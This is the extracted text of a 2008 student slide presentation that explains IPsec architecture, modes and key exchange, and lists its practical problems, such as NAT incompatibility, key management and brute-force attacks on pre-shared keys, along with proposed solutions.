IPsec Problems and

Solutions
Yasir Jan
Future Internet
29th May, 2008

1/19
Contents
 Definition
 Architecture Types
 Modes of Operation
 Key Exchange
 Multiple Options
 IPsec problems and solutions
 Summary
 References

2/19
IPsec
Definition
 IP security refers to security mechanisms implemented at the IP (Internet
Protocol) Layer to ensure integrity, authentication and confidentiality of
data during transmission in the open Internet environment.

Fig: Security
3/19
IPsec
Architecture Types
 Authentication Header
 Integrity + Authentication
 Encapsulating Security Payload
 Integrity + Authentication + Confidentiality

Authentication Header Encapsulating Security Payload

Integrity Authentication Integrity Authentication Confidentiality

Fig: AH and ESP comparison

4/19
IPsec
Modes of Operation
 Transport Mode
 Only payload of the IP packet is encrypted and/or authenticated.
 Tunnel Mode
 Entire IP packet (data plus the message headers) is encrypted and/or
authenticated
IP AH Upper Protocol Headers
AH Transport mode Header Header and Packet Data

New IP AH Old IP Upper Protocol Headers

AH Tunnel mode Header Header Header and Packet Data

IP ESP Upper Protocol Headers

ESP Transport mode Header Header and Packet Data

New IP ESP Old IP Upper Protocol Headers

ESP Tunnel mode Header Header Header and Packet Data

Fig: Modes of operation 5/19

IPsec
Key Exchange
 IPsec Key Exchange Protocol is a
combination of many protocols
 ISAKMP is a generic protocol
 OAKLEY is a specific mechanism using
various modes. Most of IKE is done
using OAKLEY
 SKEME provides features of public key
encryption and fast re-keying feature
 IKEv2 also concerns protection against
denial-of-service attacks using spoofed
packets

Fig: Key exchange

6/19
IPsec
Multiple options
 Use any Authentication method
 Cryptographic hash algorithms such as
MD5 or SHA-1, or Hashed Message
Authentication Code (HMAC)

 Use any Encryption Schemes

 Data Encryption Standard (DES),
triple-DES, Advanced Encryption
Standard (AES), and Blowfish in
common use
Fig: Many options
 Use any protocols in IKE

7/19
IPsec problems and solutions
1) Key Management in Large Networks
 When IPsec is largely
developed, key management
becomes very difficult

2) Difficult Traffic analysis

 Cannot check and process flags
at intermediate devices because
of encryptions

Fig: Big Networks

8/19
IPsec problems and solutions
3) Resource Consumption
 Encryption decryption processes are
computational intensive
 Cisco designed VPN accelerator card to
handle computation separately

4) Too much flexibility

 Unnecessary multiple options available
for choosing algorithms and modes
 Solution: Reduced flexibility is
sometimes better (Remove AH)

Fig: Consume many resources

9/19
IPsec problems and solutions
5) Client software
 IPsec is not implemented in TCP/IP stack, needs a
client installed
 Danger of installing malicious unreliable software by
a user
 Solution: Install clients from reliable sources
6) Relayed ICMP messages Fig: Malicious Software
 ICMP inner data is revealed to attacker, so it can be
intercepted
 Using ICMP header information IPsec packets could
be redirected, in some cases, or error messages can be
generated [1]
 Solution: Use ESP along with AH

10/19
IPsec problems and solutions
7) Scrambled Group passwords recovery
 IPsec passwords were first sniffed from memories,
when used, so Cisco VPN clients were designed to
scramble the passwords in memory, but they were
hacked again
 Once getting group password, an attacker can
hijack a connection from a user and get other
usernames and passwords
8) No End-End Protection
 Applications use their own SSL or other techniques
 IETF working on API integrated with IPsec to achieve
maximum use

Fig: Scrambled passwords

11/19
IPsec problems and solutions
9) Firewalls
 firewalls monitor the ports and protocols that the
traffic originates from and is designated for, to
determine the traffic’s “acceptability” before
allowing the traffic through
 Firewall is easy to setup with the standard
exceptions and any customizations you need
 With IPsec you have to create rules with filter
lists and actions and then add these to a policy,
and then distribute them and ….

 But IPsec has many good things as compared to Fig: IPsec vs firewalls
firewalls like encryption, no bottle necks etc
12/19
IPsec problems and solutions
10) VoIP Quality loss
 Scheduling causes packet loss
in real time applications
 Latency in VoIPs

11) Denial of Service

 Send too many acknowledge
messages to the victim during Fig: Voice quality
wait period of TCP connection
timeout and
 Solution: IKEv2 has the Denial of service
solution

13/19
IPsec problems and solutions
12) Multicast Traffic
 Packets have single destination
addresses, so difficult to mange SPI
 Some applications using streaming
multimedia assign port numbers
dynamically, so IPsec policy
becomes difficult to assign
 IPsec has multicast option but is not
enough for all occasions
13) Security within algorithms
 IPsec works with other protocols for
security. They should be secure
enough to stop attacker otherwise Fig: Multicast traffic
only secure IPsec is useless
14/19
IPsec problems and solutions
14) Brute Force Attack
 ESP initiation scheme is fixed 3 steps of Aggressive mode, so
intruder may try to delay the initiation during which it will find the
key by brute force attack
 Crack Tool was used with Pre-Shared-Key IKE authentication [2] for
guessing with brute force

Fig: Trying out ALL options by brute force 15/19

 IPsec problems and solutions
15) Incompatibility with NAT (RFC 3715)
 Network Address Translation (NAT) was
developed to answer the impending
problems of the limit of IPv4 addresses
 When NAT changes the IP addresses or
ports in the IP header, IPSec cannot re-
calculate the hash because it is not
knowledgeable about the key and so IPsec
drops the packets. In ESP the NAT device
cannot access and change the port
information inside the encrypted TCP
headers of the packets
 Solution: NAT-T (encapsulation of the
IPsec part of the IP packet in yet another
UDP header between the ESP portion of
the packet and the original IP header. ) Fig: IPsec and NAT are
incompatible
16/19
Summary
 IPsec has multiple components
 Security and authentication is provided by additional components so they
should be also secure
 IPsec have some incompatibility issues
 IPsec is overall complex, needs simplification

Fig: Summary 17/19

References
 http://searchsecurity.techtarget.com/news/article/0,289142,sid14_gci1086803,00.h
tml
 http://ikecrack.sourceforge.net/
 http://www.securitydocs.com/pdf/2926.PDF
 http://www.cisco.com
 http://www.springerlink.com/content/t84w482122jt81x3/fulltext.pdf
 http://blogs.msdn.com/james_morey/default.aspx
 Images taken from various sources on internet

Fig: References 18/19

Thankyou

Fig: Questions
19/19